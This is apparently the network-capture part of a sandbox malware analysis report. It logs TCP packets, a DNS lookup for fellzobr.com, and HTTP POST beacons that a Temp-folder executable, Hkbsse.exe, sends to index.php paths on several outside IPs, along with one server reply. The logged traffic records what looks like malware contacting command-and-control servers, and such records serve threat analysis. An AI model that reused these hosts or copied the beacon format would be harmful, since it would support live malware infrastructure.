                  Jul 10, 2024 17:36:12.755965948 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.756007910 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.756043911 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.756081104 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.756212950 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.756261110 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.756268024 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.756315947 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.756894112 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.756948948 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.756968021 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.757016897 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.757024050 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.757070065 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.757405043 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.757455111 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.757499933 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.757545948 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.757551908 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.757596970 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.757683039 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.757730007 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.757739067 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.757791042 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.758399010 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.758445978 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.758452892 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.758498907 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.758583069 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.758629084 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.758635998 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.758681059 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.759183884 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.759226084 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.759249926 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.759294033 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.759299994 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.759342909 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.759454012 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.759500027 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.760040998 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.760087967 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.842961073 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.843039036 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.843075991 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.843126059 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.843168020 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.843219995 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.843264103 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.843321085 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.843358994 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.843413115 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.843542099 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.843645096 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.844062090 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.844135046 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.844266891 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.844316959 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.844364882 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.844424009 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.844918013 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.844988108 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.845208883 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.845268011 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.845468044 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.845530987 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.845901966 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.846064091 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.846096039 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.846111059 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.846131086 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.846190929 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.846780062 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.846832991 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.847023010 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.847074032 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.847275972 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.847325087 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.847873926 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.847928047 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.848042011 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.848093033 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.930109978 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.930185080 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.930391073 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.930422068 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.930666924 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.930671930 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.930718899 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.930749893 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.930775881 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.930830956 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.930890083 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.931067944 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.931128979 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.931159019 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.931210995 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.931674004 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.931740046 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.931766033 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.931822062 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.932224035 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.932295084 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.932385921 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.932447910 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.932511091 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.932566881 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.932600021 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.932657957 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.933254004 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.933325052 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.934509039 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.934581041 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.934708118 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.934766054 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.934815884 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.934875011 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.935075045 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.935137987 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.935163975 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.935224056 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.935700893 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.935765028 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.935801983 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.935861111 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.935893059 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.935951948 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.936566114 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.936625004 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.936655045 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.936712980 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.936747074 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.936800003 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.936830044 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.936887980 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.016710043 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.016797066 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.016828060 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.016882896 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.017436028 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.017489910 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.017513990 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.017522097 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.017546892 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.017560005 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.018559933 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.018615007 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.018639088 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.018646002 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.018671989 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.018692970 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.019042015 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.019098043 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.019119978 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.019125938 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.019153118 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.019169092 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.020061016 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.020107985 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.020128012 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.020134926 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.020163059 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.020179987 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.021074057 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.021123886 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.021147966 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.021153927 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.021182060 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.021199942 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.022053957 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.022104025 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.022125006 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.022130966 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.022156954 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.022176027 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.023041010 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.023088932 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.023106098 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.023113966 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.023144960 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.023154020 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.103799105 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.103869915 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.104038954 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.104038954 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.104073048 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.104120970 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.104557037 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.104612112 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.104633093 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.104640961 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.104671955 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.104684114 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.105652094 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.105695963 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.105720997 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.105727911 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.105751991 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.105772018 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.106654882 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.106698990 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.106723070 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.106729031 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.106760025 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.106771946 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.107588053 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.107631922 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.107656002 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.107661963 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.107686043 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.107702971 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.108325958 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.108376026 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.108402014 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.108407974 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.108428001 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.108454943 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.108460903 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.108509064 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.108562946 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.108566999 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.108589888 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.108613968 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.143362045 CEST4972980192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:13.143625021 CEST4973480192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:13.149002075 CEST804973489.23.103.42192.168.2.6
                  Jul 10, 2024 17:36:13.149071932 CEST4973480192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:13.149159908 CEST4973480192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:13.149336100 CEST804972989.23.103.42192.168.2.6
                  Jul 10, 2024 17:36:13.149384022 CEST4972980192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:13.154664040 CEST804973489.23.103.42192.168.2.6
                  Jul 10, 2024 17:36:14.068423986 CEST804973489.23.103.42192.168.2.6
                  Jul 10, 2024 17:36:14.068624020 CEST4973480192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:14.281595945 CEST8049733185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:14.283543110 CEST4973380192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:14.392549992 CEST4973380192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:14.393966913 CEST4973580192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:14.398442984 CEST8049733185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:14.398818970 CEST8049735185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:14.398921013 CEST4973580192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:14.399072886 CEST4973580192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:14.403877020 CEST8049735185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:14.823916912 CEST4973580192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:14.823971033 CEST4973180192.168.2.6185.208.158.116
                  Jul 10, 2024 17:36:14.934020996 CEST4973680192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:14.934170961 CEST4973780192.168.2.6185.208.158.116
                  Jul 10, 2024 17:36:14.939307928 CEST8049736185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:14.939322948 CEST8049737185.208.158.116192.168.2.6
                  Jul 10, 2024 17:36:14.939379930 CEST4973680192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:14.939397097 CEST4973780192.168.2.6185.208.158.116
                  Jul 10, 2024 17:36:14.939579010 CEST4973680192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:14.939673901 CEST4973780192.168.2.6185.208.158.116
                  Jul 10, 2024 17:36:14.944345951 CEST8049736185.209.162.226192.168.2.6
                  Jul 10, 2024 17:36:14.944493055 CEST8049737185.208.158.116192.168.2.6
                  Jul 10, 2024 17:36:15.240952969 CEST4973480192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:15.241389990 CEST4973680192.168.2.6185.209.162.226
                  Jul 10, 2024 17:36:15.241446018 CEST4973780192.168.2.6185.208.158.116

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 10, 2024 17:36:11.628673077 CEST5554953192.168.2.61.1.1.1
                  Jul 10, 2024 17:36:11.645061016 CEST53555491.1.1.1192.168.2.6

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jul 10, 2024 17:36:11.628673077 CEST192.168.2.61.1.1.10xfc98Standard query (0)fellzobr.comA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jul 10, 2024 17:36:11.645061016 CEST1.1.1.1192.168.2.60xfc98No error (0)fellzobr.com188.114.96.3A (IP address)IN (0x0001)false
                  Jul 10, 2024 17:36:11.645061016 CEST1.1.1.1192.168.2.60xfc98No error (0)fellzobr.com188.114.97.3A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • fellzobr.com
                  • 185.208.158.116
                  • 89.23.103.42
                  • 185.209.162.226

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.649725185.208.158.116806912C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  TimestampBytes transferredDirectionData
                  Jul 10, 2024 17:36:06.824712038 CEST159OUTPOST /hb9IvshS01/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.208.158.116
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.64972489.23.103.42806912C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  TimestampBytes transferredDirectionData
                  Jul 10, 2024 17:36:06.824728012 CEST156OUTPOST /hb9IvshS02/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 89.23.103.42
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.649726185.209.162.226806912C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  TimestampBytes transferredDirectionData
                  Jul 10, 2024 17:36:06.824901104 CEST159OUTPOST /hb9IvshS03/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.209.162.226
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.649727185.209.162.226806912C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  TimestampBytes transferredDirectionData
                  Jul 10, 2024 17:36:08.430263042 CEST317OUTPOST /hb9IvshS03/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.209.162.226
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 33 34 37 42 33 38 37 46 33 31 42 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 35 37 41 43 34 41 32 37 45 43 31 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43
                  Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB5890B8DB99826E17CB5320708AF3357AC4A27EC1E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.649728185.209.162.226806912C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  TimestampBytes transferredDirectionData
                  Jul 10, 2024 17:36:10.172163010 CEST159OUTPOST /hb9IvshS03/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.209.162.226
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.64972989.23.103.42806912C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  TimestampBytes transferredDirectionData
                  Jul 10, 2024 17:36:10.830326080 CEST314OUTPOST /hb9IvshS02/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 89.23.103.42
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 33 34 37 42 33 38 37 46 33 31 42 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 35 37 41 43 34 41 32 37 45 43 31 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43
                  Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB5890B8DB99826E17CB5320708AF3357AC4A27EC1E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
                  Jul 10, 2024 17:36:11.618807077 CEST279INHTTP/1.1 200 OK
                  Server: nginx/1.14.0 (Ubuntu)
                  Date: Wed, 10 Jul 2024 15:36:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 35 39 0d 0a 20 3c 63 3e 31 30 30 30 30 30 34 30 38 31 2b 2b 2b 38 62 35 39 37 63 31 32 30 36 31 31 35 35 39 66 34 64 36 64 63 63 62 31 66 32 34 65 66 38 64 31 32 62 30 37 32 30 64 35 65 30 38 32 61 35 35 38 61 34 65 62 34 66 65 65 64 62 66 66 30 37 63 31 35 33 63 66 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 59 <c>1000004081+++8b597c120611559f4d6dccb1f24ef8d12b0720d5e082a558a4eb4feedbff07c153cf#<d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.649730185.209.162.226806912C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  TimestampBytes transferredDirectionData
                  Jul 10, 2024 17:36:10.832125902 CEST317OUTPOST /hb9IvshS03/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.209.162.226
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 33 34 37 42 33 38 37 46 33 31 42 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 35 37 41 43 34 41 32 37 45 43 31 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43
                  Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB5890B8DB99826E17CB5320708AF3357AC4A27EC1E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C


